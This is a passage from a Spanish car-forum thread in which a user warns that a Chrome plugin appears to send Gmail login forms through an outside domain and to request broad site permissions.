srednalF está conectado ahora   Responder Con Cita
Viejo 16-sep-2012, 02:59   #29
alpacino
ForoCoches: Miembro
 
Avatar de alpacino
 
Oct 2010 | 3.707 Mens.
Lugar: Málaga
Cita:
Originalmente Escrito por Lockheed Ver Mensaje
famosisima
Pues lo es, seguramente para ti lo sea elitetorrent o divxtotal, esas creadas por el 1870
alpacino está desconectado   Responder Con Cita
Viejo 16-sep-2012, 03:01   #30
srednalF
ForoCoches: Flanders
 
Avatar de srednalF
 
Ago 2011 | 4.032 Mens.
Lugar: ESPAÑA

Si lees esto probablemente ya estás reportado.

con el plugin deshabilitado todo correcto :


el formulario se envia a gmail sin pasar por cuevanatv.asia dudo mucho que sea problema solo mio de todos modos quedais avisados

edit: ademas de que al instalar el plugin en chrome te avisa de que el plugin pide permiso para obtener acceso en 13 o 14 paginas distintas


srednalF está conectado ahora   Responder Con Cita

Respuesta

Regresar   Inicio | ForoCoches > Zona General > General
Herramientas


 [ VERSIÓN MÓVIL ]
ForoCoches.com LWNET © 1999 - 2014| Powered by © vBulletin Solutions, Inc
Info Legal | Privacidad | Cookies | Normas de uso | Publicidad | Servidores | Stats | Ayuda | Contacto